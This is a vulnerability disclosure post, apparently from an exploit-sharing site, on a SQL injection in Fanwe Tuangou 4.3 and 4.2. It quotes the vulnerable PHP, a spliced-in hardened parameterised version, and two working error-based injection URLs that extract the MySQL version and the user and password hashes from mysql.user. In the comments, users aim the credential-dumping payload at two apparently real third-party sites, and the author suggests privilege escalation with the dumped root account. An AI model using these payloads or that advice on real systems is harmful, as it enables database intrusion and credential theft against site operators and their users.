漏洞时代 - Latest Vulnerabilities_0DaY5.CoM

Fanwe Tuangou (方维团购) 4.3 latest version SQL injection, also hits 4.2

\\app\source\goods_list.php
[php]
// Group-buy categories
$sidegoodscatelist = getGoodsCate(" and pid=0 ");
$catepid = 0; // category ID
$pid = 0; // top-level category ID
$sub_cate_list = array(); // sub-categories
$is_top_cate = 0; // whether this is a top-level category
if($_REQUEST['m'] =="Goods" && $_REQUEST['a'] == "showcate" && $_REQUEST['id']!="")
{
    $catepid = $_REQUEST['id']; // takes the received parameter id as-is
    foreach($sidegoodscatelist as $k => $v){
        if($v['id']==$catepid)
        {
            $is_top_cate=1;
        }
    }

    if($is_top_cate==0)
    {
        $sub_cate_list = getGoodsCate(" and pid=".$GLOBALS['db']->getOne("select pid from " . DB_PREFIX . "goods_cate where id=".$catepid));
        // Executes: select pid from " . DB_PREFIX . "goods_cate where id=" . $_REQUEST['id']
        // which is where the injection happens
        foreach($sub_cate_list as $kk => $vv)
        {
            if($vv['id']==$catepid)
            {
                $pid = $vv['pid'];
            }
        }
    }
    else
    {
        $sub_cate_list = getGoodsCate(" and pid=".$catepid);
        $pid = $_REQUEST['id'];
    }
}
$GLOBALS['tpl']->assign('sidegoodscatelist',$sidegoodscatelist);
//var_dump($sidegoodscatelist);exit;
$GLOBALS['tpl']->assign('catepid',$catepid);
$GLOBALS['tpl']->assign('sub_cate_list',$sub_cate_list);
$GLOBALS['tpl']->assign('is_top_cate',$is_top_cate);
$GLOBALS['tpl']->assign('pid',$pid);
// end group-buy categories
[/php]
As you can see, in
[php]if($_REQUEST['m'] =="Goods" && $_REQUEST['a'] == "showcate" && $_REQUEST['id']!="")[/php]
if m=Goods, a=showcate and the id value passed in is not empty, then
[php]$catepid = $_REQUEST['id'];[/php]
takes the received parameter id without any validation,

and it is concatenated straight into the SQL statement
[php]select pid from " . DB_PREFIX . "goods_cate where id=".$catepid[/php]
which is what causes the injection.
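For comparison, the same parent-category lookup in a hardened form, as an added example that is not Fanwe's code: the id is validated as an integer before use and then bound as a parameter instead of being concatenated. It assumes a PDO connection (an in-memory SQLite fixture is constructed here), a constructed DB_PREFIX value, and the goods_cate(id, pid) layout the vulnerable query implies.

```php
<?php
// Added example (not the Fanwe code base): hardened version of the
// "select pid from <prefix>goods_cate where id=..." lookup.
declare(strict_types=1);

const DB_PREFIX = 'fanwe_'; // constructed prefix; the real site reads this from config

function getParentCateId(PDO $pdo, $rawId): ?int
{
    // 1. Validate: only a non-negative integer string is accepted. Anything like
    //    "103 and (select 1 from ...)" makes filter_var() return false and is rejected
    //    before it reaches the database layer.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($id === false) {
        return null;
    }

    // 2. Parameterise: the value travels as a bound parameter, never as query text,
    //    so even a value that passed validation cannot change the statement's structure.
    $stmt = $pdo->prepare('SELECT pid FROM ' . DB_PREFIX . 'goods_cate WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $pid = $stmt->fetchColumn();

    return $pid === false ? null : (int) $pid; // null when no such category exists
}

// Constructed fixture so the example runs offline: two categories, 103 under 1.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE ' . DB_PREFIX . 'goods_cate (id INTEGER PRIMARY KEY, pid INTEGER)');
$pdo->exec('INSERT INTO ' . DB_PREFIX . 'goods_cate (id, pid) VALUES (1, 0), (103, 1)');

var_dump(getParentCateId($pdo, '103'));                        // int(1)
var_dump(getParentCateId($pdo, '103 and (select 1 from x)'));  // NULL: rejected at validation
var_dump(getParentCateId($pdo, '999'));                        // NULL: valid id, no row
```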
Exploit:
1. Determine the MySQL version
[php]http://0day5.com/index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)[/php]

2. Retrieve the MySQL account and password
[php]http://0day5.com/index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(0x3a,host,0x3a,user,0x3a,password)%20FROM%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)[/php]

This original article may not be reproduced without permission.

Comments (16)

  1. Thanks for taking the trouble to put together so much material, concise and comprehensive

    爆笑笑话 2014-11-13
  2. This is probably from some "37" site or other, right?

    Ray 2014-07-17
  3. Boss, could you write an exp that grabs the account password? I don't know how to modify yours

    小菜鸟 2014-07-15
    • Using your brain a little helps you learn

      0day5 2014-07-21
  4. Can't it dump the admin backend password? There aren't that many root accounts around

    shy 2014-07-14
    • Yes it can, this is just an example

      0day5 2014-07-21
  5. By the way, how come the dumped MySQL password is 41 characters long?

    adsf 2014-07-13
    • Look at the picture carefully, one of the digits is extra

      0day5 2014-07-21
    • ..........

      0day5 2014-07-13
  6. http://tg.np5.com/index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(0x3a,host,0x3a,user,0x3a,password)%20FROM%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)

    神速小白 2014-07-11
    • This... is only provided for you-know-what, don't use it for illegal purposes

      0day5 2014-07-11
  7. http://qianrengou.com/index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(0x3a,host,0x3a,user,0x3a,password)%20FROM%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)

    神速小白 2014-07-11
    • This... is only provided for you-know-what, don't use it for illegal purposes

      0day5 2014-07-11
      • :razz: How do you use the dumped root?

        asdfg 2014-07-20
        • If remote connections are allowed, or there is a phpMyAdmin, you can try privilege escalation

          0day5 2014-07-21